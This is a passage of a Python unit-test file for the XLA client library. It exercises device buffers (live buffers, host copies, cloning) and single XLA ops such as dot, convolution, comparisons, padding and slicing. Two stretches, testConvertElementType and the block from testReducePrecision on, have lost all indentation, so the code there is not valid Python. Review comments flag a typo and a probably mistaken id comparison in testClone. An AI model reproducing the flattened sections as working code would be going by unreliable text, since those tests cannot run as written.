    with self.assertRaisesRegex(
        RuntimeError,
        re.escape(
            "BlockHostUntilReady() called on deleted or donated buffer")):
      buffer.block_host_until_ready()

  def testDeviceArrayBaseSignatures(self):
    # When extending `DeviceArrayBase`, the object behaves as a `DeviceArray`
    # and thus needs to correctly implement the following methods.
    # NOTE(review): the skip message below has a typo ("objectof"); left
    # unchanged here since it is a runtime string.
    arg = np.array([[1., 2., 3.]], np.float32)
    buffer = self.backend.buffer_from_pyval(arg)
    if not isinstance(buffer, xla_client.DeviceArrayBase):
      raise unittest.SkipTest(
          "The objectof type {} do not extend DeviceArrayBase".format(
              type(buffer)))
    self.assertEqual(buffer.__array_priority__, 100)
    self.assertEqual(buffer.shape, (1, 3))
    self.assertEqual(buffer.dtype, np.float32)
    self.assertEqual(buffer.size, 3)
    self.assertEqual(buffer.ndim, 2)
    self.assertIs(buffer, buffer.block_until_ready())
    buffer.delete()
    with self.assertRaises(RuntimeError):
      buffer.block_until_ready()

  def testOnDeviceSizeInBytes(self):
    if not isinstance(self.backend, xla_client.Client):
      self.skipTest("TPU Driver doesn't support OnDeviceSizeInBytes.")
    arg0 = np.array([])
    arg1 = np.array([[0., 1., 2.]], np.float32)
    arg2 = np.array([[3., 4., 5.]], bfloat16)
    arg0_buffer = self.backend.buffer_from_pyval(arg0)
    arg1_buffer = self.backend.buffer_from_pyval(arg1)
    arg2_buffer = self.backend.buffer_from_pyval(arg2)
    self.assertEqual(arg0_buffer.on_device_size_in_bytes(), 0)
    # OnDeviceSizeInBytes varies depending on the platform. Confirm there's
    # a reasonable value.
    self.assertGreater(arg1_buffer.on_device_size_in_bytes(), 0)
    self.assertGreater(arg2_buffer.on_device_size_in_bytes(), 0)

  def testLiveBuffers(self):
    # live_buffers() returns the most-recently-created buffer first (as
    # asserted below), and deleted buffers drop out immediately.
    if not isinstance(self.backend, xla_client.Client):
      self.skipTest("TPU Driver doesn't support LiveBuffers().")
    self.assertEmpty(self.backend.live_buffers())
    arg0 = np.array([])
    arg1 = np.array([[0., 1., 2.]], np.float32)
    arg2 = np.array([[3., 4., 5.]], bfloat16)
    arg0_buffer = self.backend.buffer_from_pyval(arg0)
    arg1_buffer = self.backend.buffer_from_pyval(arg1)
    arg2_buffer = self.backend.buffer_from_pyval(arg2)
    self.assertLen(self.backend.live_buffers(), 3)
    self.assertIs(self.backend.live_buffers()[0], arg2_buffer)
    self.assertIs(self.backend.live_buffers()[1], arg1_buffer)
    self.assertIs(self.backend.live_buffers()[2], arg0_buffer)
    arg1_buffer.delete()
    self.assertLen(self.backend.live_buffers(), 2)
    self.assertIs(self.backend.live_buffers()[0], arg2_buffer)
    self.assertIs(self.backend.live_buffers()[1], arg0_buffer)
    arg0_buffer.delete()
    arg2_buffer.delete()
    self.assertEmpty(self.backend.live_buffers())

  def testCopyToHost(self):
    arg0 = np.array([[1., 2.]], np.float32)
    arg1 = np.array([[3., 4.]], np.float32)
    arg0_buffer = self.backend.buffer_from_pyval(arg0)
    arg1_buffer = self.backend.buffer_from_pyval(arg1)
    # Prefetch two buffers using copy_to_host_async, and then retrieve their
    # values using to_py.
    arg0_buffer.copy_to_host_async()
    arg0_buffer.copy_to_host_async()  # Duplicate calls don't do anything.
    arg1_buffer.copy_to_host_async()
    np.testing.assert_equal(arg0, arg0_buffer.to_py())
    np.testing.assert_equal(arg1, arg1_buffer.to_py())
    # copy_to_host_async does nothing after to_py is called.
    arg0_buffer.copy_to_host_async()
    np.testing.assert_equal(arg0, arg0_buffer.to_py())

  def testDevice(self):
    # A buffer placed on an explicit device reports that device and
    # round-trips its value.
    x = np.arange(8, dtype=np.int32)
    for device in self.backend.local_devices():
      buf = self.backend.buffer_from_pyval(x, device=device)
      self.assertEqual(buf.device(), device)
      np.testing.assert_equal(x, buf.to_py())

  def testStandardTypes(self):
    for dtype in standard_dtypes:
      # bfloat16 and complex128 are skipped for this conversion path.
      if dtype == bfloat16 or dtype == np.complex128:
        continue
      arr = self.backend.buffer_from_pyval(np.array([0, 1], dtype))
      arr = arr.to_py()
      self.assertEqual(dtype, type(arr[0]))

  def testUnsafeBufferPointer(self):
    if not isinstance(self.backend, xla_client.Client):
      self.skipTest("TPU Driver doesn't support UnsafeBufferPointer().")
    arg0 = np.array([])
    arg1 = np.array([[0., 1., 2.]], np.float32)
    arg2 = np.array([[3., 4., 5.]], bfloat16)
    arg0_buffer = self.backend.buffer_from_pyval(arg0)
    arg1_buffer = self.backend.buffer_from_pyval(arg1)
    arg2_buffer = self.backend.buffer_from_pyval(arg2)
    self.assertGreaterEqual(arg0_buffer.unsafe_buffer_pointer(), 0)
    self.assertGreaterEqual(arg1_buffer.unsafe_buffer_pointer(), 0)
    self.assertGreaterEqual(arg2_buffer.unsafe_buffer_pointer(), 0)

  @unittest.skipIf(cloud_tpu, "not implemented")
  def testClone(self):
    x = np.array([[3., 4., 5.]], np.float32)
    y = self.backend.buffer_from_pyval(x)
    z = y.clone()
    # NOTE(review): comparing id(x) (a numpy array) with id(y) (a buffer) is
    # always unequal; presumably this was meant to be id(y) != id(z) — confirm.
    self.assertNotEqual(id(x), id(y))
    np.testing.assert_array_equal(y.to_py(), z.to_py())
    # The clone is a distinct Python object over the same device memory.
    self.assertEqual(y.unsafe_buffer_pointer(), z.unsafe_buffer_pointer())

  @unittest.skipIf(cloud_tpu, "not implemented")
  def testJaxAttributesHaveCorrectDefaults(self):
    x = np.array([[3., 4., 5.]], np.float32)
    y = self.backend.buffer_from_pyval(x)
    self.assertIsNone(y.aval)
    self.assertIsNone(y._device)


tests.append(BufferTest)
class SingleOpTest(ComputationTest):
  """Tests for single ops.

  The goal here is smoke testing - to exercise the most basic functionality of
  single XLA ops. As minimal as possible number of additional ops are added
  around the op being tested.
  """

  @parameterized.named_parameters({
      "testcase_name": "_{}".format(dtype.__name__),
      "dtype": dtype,
  } for dtype in float_dtypes)
  def testConcatenate(self, dtype):
    # Concatenates two rank-1 constants along dimension 0.
    c = self._NewComputation()
    args = (
        ops.Constant(c, np.array([1.0, 2.0, 3.0], dtype=dtype)),
        ops.Constant(c, np.array([4.0, 5.0, 6.0], dtype=dtype)),
    )
    ops.ConcatInDim(c, args, dimension=0)
    self._ExecuteAndCompareExact(
        c, expected=[np.array([1.0, 2.0, 3.0, 4.0, 5.0, 6.0], dtype=dtype)])
# pyformat: disable
@parameterized.named_parameters({
"testcase_name": "_{}_{}".format(src_dtype.__name__,
dst_dtype.__name__),
"src_dtype": src_dtype,
"dst_dtype": dst_dtype,
} for src_dtype, dst_dtype in itertools.permutations(
[np.bool, np.int32, np.int64, np.float32, np.float64], 2))
# pyformat: enable
def testConvertElementType(self, src_dtype, dst_dtype):
if ((src_dtype in [np.int64, np.float64] or
dst_dtype in [np.int64, np.float64]) and
self.backend.platform == "tpu"):
self.skipTest("TPU doesn't support float64")
c = self._NewComputation()
x = np.array([0, 1, 0, 0, 1], dtype=src_dtype)
ops.ConvertElementType(
ops.Constant(c, x), xla_client.dtype_to_etype(dst_dtype))
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
self.assertLen(result, 1)
expected = np.array(x, dtype=dst_dtype)
self.assertEqual(result[0].shape, expected.shape)
self.assertEqual(result[0].dtype, expected.dtype)
np.testing.assert_equal(result[0], expected)
  # pyformat: disable
  @parameterized.named_parameters(
      {
          "testcase_name": "_{}_{}".format(src_dtype.__name__,
                                           dst_dtype.__name__),
          "src_dtype": src_dtype,
          "dst_dtype": dst_dtype,
      }
      for dtypes in [[np.int32, np.float32], [np.int64, np.float64]]
      for src_dtype, dst_dtype in itertools.permutations(dtypes, 2))
  # pyformat: enable
  def testBitcastConvertType(self, src_dtype, dst_dtype):
    # Bitcasts between same-width int/float pairs and compares against
    # numpy's view() reinterpretation of the same bytes.
    if (np.float64 in (src_dtype, dst_dtype) and
        self.backend.platform == "tpu"):
      self.skipTest("TPU doesn't support float64")
    c = self._NewComputation()
    x = np.array([0, 1, 0, 0, 1], dtype=src_dtype)
    ops.BitcastConvertType(
        ops.Constant(c, x), xla_client.dtype_to_etype(dst_dtype))
    result = xla_client.execute_with_python_values(
        self.backend.compile(c.build()), (), backend=self.backend)
    self.assertLen(result, 1)
    expected = x.view(dst_dtype)
    self.assertEqual(result[0].shape, expected.shape)
    self.assertEqual(result[0].dtype, expected.dtype)
    np.testing.assert_equal(result[0], expected)
  # TODO(b/123523486) implement AllToAll on CPU
  def DISABLED_testAllToAllOneReplica(self):
    # Disabled: AllToAll is not implemented on CPU (see TODO above).
    samples = [
        NumpyArrayF32([97.0]),
        NumpyArrayF32([64.0, 117.0]),
        NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]),
    ]
    for lhs in samples[:1]:
      c = self._NewComputation()
      ops.AllToAll(ops.Constant(c, lhs), 0, 0)
      self._ExecuteAndCompareExact(c, expected=[lhs])

  def testCrossReplicaSumOneReplica(self):
    # With a single replica the cross-replica sum is the identity.
    samples = [
        NumpyArrayF32(42.0),
        NumpyArrayF32([97.0]),
        NumpyArrayF32([64.0, 117.0]),
        NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]),
    ]
    for lhs in samples:
      c = self._NewComputation()
      ops.CrossReplicaSum(ops.Constant(c, lhs))
      self._ExecuteAndCompareExact(c, expected=[lhs])

  def testReplicaId(self):
    # Single-replica execution always observes replica id 0.
    c = self._NewComputation()
    _ = ops.ReplicaId(c)
    self._ExecuteAndCompareExact(c, expected=[0])

  def testCrossReplicaSumOneReplicaWithSingletonGroup(self):
    # Same as testCrossReplicaSumOneReplica, but with an explicit
    # single-replica group.
    samples = [
        NumpyArrayF32(42.0),
        NumpyArrayF32([97.0]),
        NumpyArrayF32([64.0, 117.0]),
        NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]),
    ]
    for lhs in samples:
      c = self._NewComputation()
      ops.CrossReplicaSum(
          ops.Constant(c, lhs), xla_client.make_replica_groups([[0]]))
      self._ExecuteAndCompareExact(c, expected=[lhs])
  # TODO(phawkins): np.dot implementation doesn't support bfloat16
  @parameterized.named_parameters({
      "testcase_name": "_{}".format(dtype.__name__),
      "dtype": dtype,
  } for dtype in float_dtypes if dtype != bfloat16)
  def testDotMatrixVector(self, dtype):
    # Matrix x column-vector product, checked against np.dot.
    c = self._NewComputation()
    lhs = np.array([[2.0, 3.0], [4.0, 5.0]], dtype=dtype)
    rhs = np.array([[10.0], [20.0]], dtype=dtype)
    ops.Dot(ops.Constant(c, lhs), ops.Constant(c, rhs))
    self._ExecuteAndCompareClose(c, expected=[np.dot(lhs, rhs)])

  # TODO(phawkins): np.dot implementation doesn't support bfloat16
  @parameterized.named_parameters({
      "testcase_name": "_{}".format(dtype.__name__),
      "dtype": dtype,
  } for dtype in float_dtypes if dtype != bfloat16)
  def testDotMatrixMatrix(self, dtype):
    # Matrix x matrix product, checked against np.dot.
    c = self._NewComputation()
    lhs = np.array([[2.0, 3.0], [4.0, 5.0]], dtype=dtype)
    rhs = np.array([[10.0, 20.0], [100.0, 200.0]], dtype=dtype)
    ops.Dot(ops.Constant(c, lhs), ops.Constant(c, rhs))
    self._ExecuteAndCompareClose(c, expected=[np.dot(lhs, rhs)])

  def testDotGeneral(self):
    # Batched matmul via dimension numbers: contract lhs dim 2 with rhs
    # dim 1; batch over dim 0 of both operands.
    c = self._NewComputation()
    rng = np.random.RandomState(0)
    lhs = NumpyArrayF32(rng.randn(10, 3, 4))
    rhs = NumpyArrayF32(rng.randn(10, 4, 5))
    dimension_numbers = xla_client.make_dot_dimension_numbers(
        (([2], [1]), ([0], [0])))
    ops.DotGeneral(
        ops.Constant(c, lhs), ops.Constant(c, rhs), dimension_numbers)
    self._ExecuteAndCompareClose(c, expected=[np.matmul(lhs, rhs)], rtol=1e-6)

  def testDotGeneralWithDotDimensionNumbersProto(self):
    # Same as testDotGeneral, but constructs the DotDimensionNumbers proto
    # field-by-field instead of via the make_* helper.
    c = self._NewComputation()
    rng = np.random.RandomState(0)
    lhs = NumpyArrayF32(rng.randn(10, 3, 4))
    rhs = NumpyArrayF32(rng.randn(10, 4, 5))
    dimension_numbers = xla_client.DotDimensionNumbers()
    dimension_numbers.lhs_contracting_dimensions.append(2)
    dimension_numbers.rhs_contracting_dimensions.append(1)
    dimension_numbers.lhs_batch_dimensions.append(0)
    dimension_numbers.rhs_batch_dimensions.append(0)
    ops.DotGeneral(
        ops.Constant(c, lhs), ops.Constant(c, rhs), dimension_numbers)
    self._ExecuteAndCompareClose(c, expected=[np.matmul(lhs, rhs)], rtol=1e-6)

  def testDotGeneralWithPrecisionConfig(self):
    # Same computation with an explicit per-operand precision config.
    c = self._NewComputation()
    rng = np.random.RandomState(0)
    lhs = NumpyArrayF32(rng.randn(10, 3, 4))
    rhs = NumpyArrayF32(rng.randn(10, 4, 5))
    dimension_numbers = xla_client.make_dot_dimension_numbers(
        (([2], [1]), ([0], [0])))
    config = xla_client.PrecisionConfig()
    config.operand_precision.append(config.Precision.HIGH)
    config.operand_precision.append(config.Precision.HIGHEST)
    ops.DotGeneral(
        ops.Constant(c, lhs),
        ops.Constant(c, rhs),
        dimension_numbers,
        precision_config=config)
    self._ExecuteAndCompareClose(c, expected=[np.matmul(lhs, rhs)], rtol=1e-6)
  def testConvGeneralDilatedF32(self):
    # Basic dilated convolution in NCHW layout against a hand-computed result.
    c = self._NewComputation()
    a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
    lhs = a(1, 1, 2, 3)
    rhs = a(1, 1, 1, 2) * 10
    strides = [1, 1]
    pads = [(1, 0), (0, 1)]
    lhs_dilation = (2, 1)
    rhs_dilation = (1, 1)
    dimension_numbers = xla_client.make_convolution_dimension_numbers(
        ("NCHW", "OIHW", "NCHW"), 2)
    ops.ConvGeneralDilated(
        ops.Constant(c, lhs), ops.Constant(c, rhs), strides, pads,
        lhs_dilation, rhs_dilation, dimension_numbers)
    result = np.array([[[
        [0., 0., 0.],
        [10., 20., 0.],
        [0., 0., 0.],
        [40., 50., 0.],
    ]]])
    self._ExecuteAndCompareClose(c, expected=[result])

  def testConvGeneralDilatedF32WithPrecisionConfig(self):
    # Same convolution as above, plus an explicit precision config.
    c = self._NewComputation()
    a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
    lhs = a(1, 1, 2, 3)
    rhs = a(1, 1, 1, 2) * 10
    strides = [1, 1]
    pads = [(1, 0), (0, 1)]
    lhs_dilation = (2, 1)
    rhs_dilation = (1, 1)
    dimension_numbers = xla_client.make_convolution_dimension_numbers(
        ("NCHW", "OIHW", "NCHW"), 2)
    config = xla_client.PrecisionConfig()
    config.operand_precision.append(config.Precision.HIGHEST)
    config.operand_precision.append(config.Precision.DEFAULT)
    ops.ConvGeneralDilated(
        ops.Constant(c, lhs),
        ops.Constant(c, rhs),
        strides,
        pads,
        lhs_dilation,
        rhs_dilation,
        dimension_numbers,
        precision_config=config)
    result = np.array([[[
        [0., 0., 0.],
        [10., 20., 0.],
        [0., 0., 0.],
        [40., 50., 0.],
    ]]])
    self._ExecuteAndCompareClose(c, expected=[result])

  def testConvGeneralDilatedPermutedF32(self):
    # Same convolution with permuted input/output layouts; the expected
    # result is correspondingly transposed.
    c = self._NewComputation()
    a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
    lhs = a(1, 1, 2, 3)
    rhs = a(1, 1, 1, 2) * 10
    strides = [1, 1]
    pads = [(1, 0), (0, 1)]
    lhs_dilation = (2, 1)
    rhs_dilation = (1, 1)
    dimension_numbers = xla_client.make_convolution_dimension_numbers(
        ("NHWC", "OIHW", "CWNH"), 2)
    ops.ConvGeneralDilated(
        ops.Constant(c, np.transpose(lhs,
                                     (0, 2, 3, 1))), ops.Constant(c, rhs),
        strides, pads, lhs_dilation, rhs_dilation, dimension_numbers)
    result = np.array([[[[0., 0., 0.], [10., 20., 0.], [0., 0., 0.],
                         [40., 50., 0.]]]])
    self._ExecuteAndCompareClose(
        c, expected=[np.transpose(result, (1, 3, 0, 2))])

  def testConvGeneralDilatedGroupedConvolutionF32(self):
    # Grouped (depthwise-style) convolution with feature_group_count=2.
    c = self._NewComputation()
    a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
    lhs = a(1, 2, 2, 3)
    rhs = a(2, 1, 1, 2) * 10
    strides = [1, 1]
    pads = [(1, 0), (0, 1)]
    lhs_dilation = (2, 1)
    rhs_dilation = (1, 1)
    dimension_numbers = xla_client.make_convolution_dimension_numbers(
        ("NCHW", "OIHW", "NCHW"), 2)
    feature_group_count = 2
    ops.ConvGeneralDilated(
        ops.Constant(c, lhs), ops.Constant(c, rhs), strides, pads,
        lhs_dilation, rhs_dilation, dimension_numbers, feature_group_count)
    result = np.array([[[
        [0., 0., 0.],
        [10., 20., 0.],
        [0., 0., 0.],
        [40., 50., 0.],
    ], [
        [0., 0., 0.],
        [330., 380., 160.],
        [0., 0., 0.],
        [480., 530., 220.],
    ]]])
    self._ExecuteAndCompareClose(c, expected=[result])
  def testBooleanNot(self):
    c = self._NewComputation()
    arr = NumpyArrayBool([True, False, True])
    ops.Not(ops.Constant(c, arr))
    self._ExecuteAndCompareClose(c, expected=[~arr])

  def testPopulationCount(self):
    # popcount(3, 0, 1) == (2, 0, 1).
    c = self._NewComputation()
    arr = NumpyArrayS32([3, 0, 1])
    ops.PopulationCount(ops.Constant(c, arr))
    self._ExecuteAndCompareClose(c, expected=[np.array([2, 0, 1])])

  def testCountLeadingZeros(self):
    # clz for 32-bit values: 0x7FFF -> 17, 0x12345678 -> 3.
    c = self._NewComputation()
    arr = NumpyArrayS32([0x7FFF, 0x12345678])
    ops.Clz(ops.Constant(c, arr))
    self._ExecuteAndCompareClose(c, expected=[[17, 3]])

  def testExp(self):
    c = self._NewComputation()
    arr = NumpyArrayF32([3.3, 12.1])
    ops.Exp(ops.Constant(c, arr))
    self._ExecuteAndCompareClose(c, expected=[np.exp(arr)])

  def testExpm1(self):
    c = self._NewComputation()
    arr = NumpyArrayF32([3.3, 12.1])
    ops.Expm1(ops.Constant(c, arr))
    self._ExecuteAndCompareClose(c, expected=[np.expm1(arr)])

  def testRound(self):
    c = self._NewComputation()
    arr = NumpyArrayF32([3.3, 12.1])
    ops.Round(ops.Constant(c, arr))
    self._ExecuteAndCompareClose(c, expected=[np.round(arr)])

  def testLog(self):
    c = self._NewComputation()
    arr = NumpyArrayF32([3.3, 12.1])
    ops.Log(ops.Constant(c, arr))
    self._ExecuteAndCompareClose(c, expected=[np.log(arr)])

  def testLog1p(self):
    c = self._NewComputation()
    arr = NumpyArrayF32([3.3, 12.1])
    ops.Log1p(ops.Constant(c, arr))
    self._ExecuteAndCompareClose(c, expected=[np.log1p(arr)])

  def testNeg(self):
    c = self._NewComputation()
    arr = NumpyArrayF32([3.3, 12.1])
    ops.Neg(ops.Constant(c, arr))
    self._ExecuteAndCompareClose(c, expected=[-arr])

  def testFloor(self):
    c = self._NewComputation()
    arr = NumpyArrayF32([3.3, 12.1])
    ops.Floor(ops.Constant(c, arr))
    self._ExecuteAndCompareClose(c, expected=[np.floor(arr)])

  def testCeil(self):
    c = self._NewComputation()
    arr = NumpyArrayF32([3.3, 12.1])
    ops.Ceil(ops.Constant(c, arr))
    self._ExecuteAndCompareClose(c, expected=[np.ceil(arr)])

  def testAbs(self):
    c = self._NewComputation()
    arr = NumpyArrayF32([3.3, -12.1, 2.4, -1.])
    ops.Abs(ops.Constant(c, arr))
    self._ExecuteAndCompareClose(c, expected=[np.abs(arr)])

  def testTanhF32(self):
    c = self._NewComputation()
    arr = NumpyArrayF32([-0.2, 3.3, 12.1, 0.1, 0.0001])
    ops.Tanh(ops.Constant(c, arr))
    self._ExecuteAndCompareClose(c, expected=[np.tanh(arr)])

  def testTanhF64(self):
    if self.backend.platform == "tpu":
      self.skipTest("TPU doesn't support 64bit tanh")
    c = self._NewComputation()
    arr = NumpyArrayF64([-0.2, 3.3, 12.1, 0.1, 0.0001])
    ops.Tanh(ops.Constant(c, arr))
    # Tight rtol: in f64 the result should match numpy almost exactly.
    self._ExecuteAndCompareClose(c, expected=[np.tanh(arr)], rtol=1e-12)
  def testTranspose(self):
    # Checks Transpose against np.transpose for several shapes and all
    # permutations of a rank-3 array (C- and Fortran-ordered).

    def _TransposeAndTest(array, permutation):
      c = self._NewComputation()
      ops.Transpose(ops.Constant(c, array), permutation)
      expected = np.transpose(array, permutation)
      self._ExecuteAndCompareClose(c, expected=[expected])

    _TransposeAndTest(NumpyArrayF32([[1, 2, 3], [4, 5, 6]]), [0, 1])
    _TransposeAndTest(NumpyArrayF32([[1, 2, 3], [4, 5, 6]]), [1, 0])
    _TransposeAndTest(NumpyArrayF32([[1, 2], [4, 5]]), [0, 1])
    _TransposeAndTest(NumpyArrayF32([[1, 2], [4, 5]]), [1, 0])

    arr = np.random.RandomState(0).randn(2, 3, 4).astype(np.float32)
    for permutation in itertools.permutations(range(arr.ndim)):
      _TransposeAndTest(arr, permutation)
      _TransposeAndTest(np.asfortranarray(arr), permutation)

  def testEq(self):
    c = self._NewComputation()
    ops.Eq(
        ops.Constant(c, NumpyArrayS32([1, 2, 3, 4])),
        ops.Constant(c, NumpyArrayS32([4, 2, 3, 1])))
    self._ExecuteAndCompareExact(c, expected=[[False, True, True, False]])

  def testNe(self):
    # Integer Ne first; then the same builder is extended with a float Ne
    # (including NaNs, where Ne is always True) and re-executed — the builder
    # is rebuilt with the new root on the second execution.
    c = self._NewComputation()
    ops.Ne(
        ops.Constant(c, NumpyArrayS32([1, 2, 3, 4])),
        ops.Constant(c, NumpyArrayS32([4, 2, 3, 1])))
    self._ExecuteAndCompareExact(c, expected=[[True, False, False, True]])

    ops.Ne(
        ops.Constant(c, NumpyArrayF32([-2.0, 0.0,
                                       float("nan"),
                                       float("nan")])),
        ops.Constant(c, NumpyArrayF32([2.0, -0.0, 1.0,
                                       float("nan")])))
    self._ExecuteAndAssertWith(
        np.testing.assert_allclose,
        c, (),
        expected=[[True, False, True, True]])

  def testGt(self):
    c = self._NewComputation()
    ops.Gt(
        ops.Constant(c, NumpyArrayS32([1, 2, 3, 4, 9])),
        ops.Constant(c, NumpyArrayS32([1, 0, 2, 7, 12])))
    self._ExecuteAndCompareExact(
        c, expected=[[False, True, True, False, False]])

  def testGe(self):
    c = self._NewComputation()
    ops.Ge(
        ops.Constant(c, NumpyArrayS32([1, 2, 3, 4, 9])),
        ops.Constant(c, NumpyArrayS32([1, 0, 2, 7, 12])))
    self._ExecuteAndCompareExact(
        c, expected=[[True, True, True, False, False]])

  def testLt(self):
    c = self._NewComputation()
    ops.Lt(
        ops.Constant(c, NumpyArrayS32([1, 2, 3, 4, 9])),
        ops.Constant(c, NumpyArrayS32([1, 0, 2, 7, 12])))
    self._ExecuteAndCompareExact(
        c, expected=[[False, False, False, True, True]])

  def testLe(self):
    c = self._NewComputation()
    ops.Le(
        ops.Constant(c, NumpyArrayS32([1, 2, 3, 4, 9])),
        ops.Constant(c, NumpyArrayS32([1, 0, 2, 7, 12])))
    self._ExecuteAndCompareExact(
        c, expected=[[True, False, False, True, True]])
  def testMax(self):
    c = self._NewComputation()
    ops.Max(
        ops.Constant(c, NumpyArrayF32([1.0, 2.0, 3.0, 4.0, 9.0])),
        ops.Constant(c, NumpyArrayF32([1.0, 0.0, 2.0, 7.0, 12.0])))
    self._ExecuteAndCompareExact(c, expected=[[1.0, 2.0, 3.0, 7.0, 12.0]])

  def testMaxExplicitBroadcastDim0(self):
    # The 1D operand is replicated along dimension 0 before the elementwise max.
    c = self._NewComputation()
    ops.Max(
        ops.Constant(c, NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
        ops.Constant(c, NumpyArrayF32([3, 4, 5])),
        broadcast_dimensions=(0,))
    self._ExecuteAndCompareExact(
        c, expected=[[[3, 3, 3], [4, 5, 6], [7, 8, 9]]])

  def testMaxExplicitBroadcastDim1(self):
    # Same as above, but replicated along dimension 1.
    c = self._NewComputation()
    ops.Max(
        ops.Constant(c, NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
        ops.Constant(c, NumpyArrayF32([3, 4, 5])),
        broadcast_dimensions=(1,))
    self._ExecuteAndCompareExact(
        c, expected=[[[3, 4, 5], [4, 5, 6], [7, 8, 9]]])

  def testMin(self):
    c = self._NewComputation()
    ops.Min(
        ops.Constant(c, NumpyArrayF32([1.0, 2.0, 3.0, 4.0, 9.0])),
        ops.Constant(c, NumpyArrayF32([1.0, 0.0, 2.0, 7.0, 12.0])))
    self._ExecuteAndCompareExact(c, expected=[[1.0, 0.0, 2.0, 4.0, 9.0]])

  def testPad(self):
    # Padding config per dim: (edge_low, edge_high, interior).
    c = self._NewComputation()
    ops.Pad(
        ops.Constant(c, NumpyArrayF32([[1.0, 2.0], [3.0, 4.0]])),
        ops.Constant(c, NumpyArrayF32(0.0)),
        xla_client.make_padding_config([(1, 2, 1), (0, 1, 0)]))
    self._ExecuteAndCompareClose(
        c,
        expected=[[[0.0, 0.0, 0.0], [1.0, 2.0, 0.0], [0.0, 0.0, 0.0],
                   [3.0, 4.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0]]])

  def testPadWithPaddingConfig(self):
    # Same as testPad, but builds the PaddingConfig proto field-by-field.
    c = self._NewComputation()
    padding_config = xla_client.PaddingConfig()
    for lo, hi, interior in [(1, 2, 1), (0, 1, 0)]:
      dimension = xla_client.PaddingConfigDimension()
      dimension.edge_padding_low = lo
      dimension.edge_padding_high = hi
      dimension.interior_padding = interior
      padding_config.dimensions.append(dimension)
    ops.Pad(
        ops.Constant(c, NumpyArrayF32([[1.0, 2.0], [3.0, 4.0]])),
        ops.Constant(c, NumpyArrayF32(0.0)), padding_config)
    self._ExecuteAndCompareClose(
        c,
        expected=[[[0.0, 0.0, 0.0], [1.0, 2.0, 0.0], [0.0, 0.0, 0.0],
                   [3.0, 4.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0]]])

  def testReshape(self):
    c = self._NewComputation()
    ops.Reshape(
        ops.Constant(c, NumpyArrayS32([[1, 2], [3, 4], [5, 6]])),
        dimensions=[0, 1],
        new_sizes=[2, 3])
    self._ExecuteAndCompareExact(c, expected=[[[1, 2, 3], [4, 5, 6]]])

  def testCollapse(self):
    # Collapses dimensions 1 and 2 of a (2, 2, 2) array into one.
    c = self._NewComputation()
    ops.Collapse(
        ops.Constant(c, NumpyArrayS32([[[1, 2], [3, 4]], [[5, 6], [7, 8]]])),
        dimensions=[1, 2])
    self._ExecuteAndCompareExact(c, expected=[[[1, 2, 3, 4], [5, 6, 7, 8]]])

  def testRev(self):
    # Reverses along dimensions 0 and 2.
    c = self._NewComputation()
    ops.Rev(
        ops.Constant(c, NumpyArrayS32([[[1, 2], [3, 4]], [[5, 6], [7, 8]]])),
        dimensions=[0, 2])
    self._ExecuteAndCompareExact(
        c, expected=[[[[6, 5], [8, 7]], [[2, 1], [4, 3]]]])
def testReducePrecision(self):
c = self._NewComputation()
ops.ReducePrecision(
ops.Constant(c, NumpyArrayF32([float.fromhex("0x1.32fffep-3")])),
exponent_bits=8,
mantissa_bits=7)
self._ExecuteAndCompareClose(c, expected=[[float.fromhex("0x1.32p-3")]])
def testClampF32(self):
c = self._NewComputation()
ops.Clamp(
ops.Constant(c, NumpyArrayF32(-1)),
ops.Constant(c, NumpyArrayF32([-2, -1, 0, 1, 2, 3])),
ops.Constant(c, NumpyArrayF32(2)))
self._ExecuteAndCompareExact(c, expected=[[-1, -1, 0, 1, 2, 2]])
def testClampS32(self):
c = self._NewComputation()
ops.Clamp(
ops.Constant(c, NumpyArrayS32(-1)),
ops.Constant(c, NumpyArrayS32([-2, -1, 0, 1, 2, 3])),
ops.Constant(c, NumpyArrayS32(2)))
self._ExecuteAndCompareExact(c, expected=[[-1, -1, 0, 1, 2, 2]])
def testSelect(self):
c = self._NewComputation()
ops.Select(
ops.Constant(c, NumpyArrayBool([True, False, False, True, False])),
ops.Constant(c, NumpyArrayS32([1, 2, 3, 4, 5])),
ops.Constant(c, NumpyArrayS32([-1, -2, -3, -4, -5])))
self._ExecuteAndCompareExact(c, expected=[[1, -2, -3, 4, -5]])
def testSlice(self):
c = self._NewComputation()
ops.Slice(
ops.Constant(c, NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
[1, 0], [3, 2], [1, 1])
self._ExecuteAndCompareExact(c, expected=[[[4, 5], [7, 8]]])
def testSliceInDim(self):
c = self._NewComputation()
ops.SliceInDim(
ops.Constant(c, NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
start_index=1,
limit_index=2,
stride=1,
dimno=1)
self._ExecuteAndCompareExact(c, expected=[[[2], [5], [8]]])
ops.SliceInDim(
ops.Constant(c, NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
start_index=0,
limit_index=3,
stride=2,
dimno=0)
self._ExecuteAndCompareExact(c, expected=[[[1, 2, 3], [7, 8, 9]]])
def testDynamicSlice(self):
c = self._NewComputation()
ops.DynamicSlice(
ops.Constant(c, NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
[ops.Constant(c, NumpyArrayS32([1, 0]))], [2, 2])
self._ExecuteAndCompareExact(c, expected=[[[4, 5], [7, 8]]])
def testDynamicUpdateSlice(self):
c = self._NewComputation()
ops.DynamicUpdateSlice(
ops.Constant(c, NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
ops.Constant(c, NumpyArrayS32([[1, 2], [3, 4]])),
[ops.Constant(c, NumpyArrayS32([1, 1]))])
self._ExecuteAndCompareExact(
c, expected=[[[1, 2, 3], [4, 1, 2], [7, 3, 4]]])
def testTuple(self):
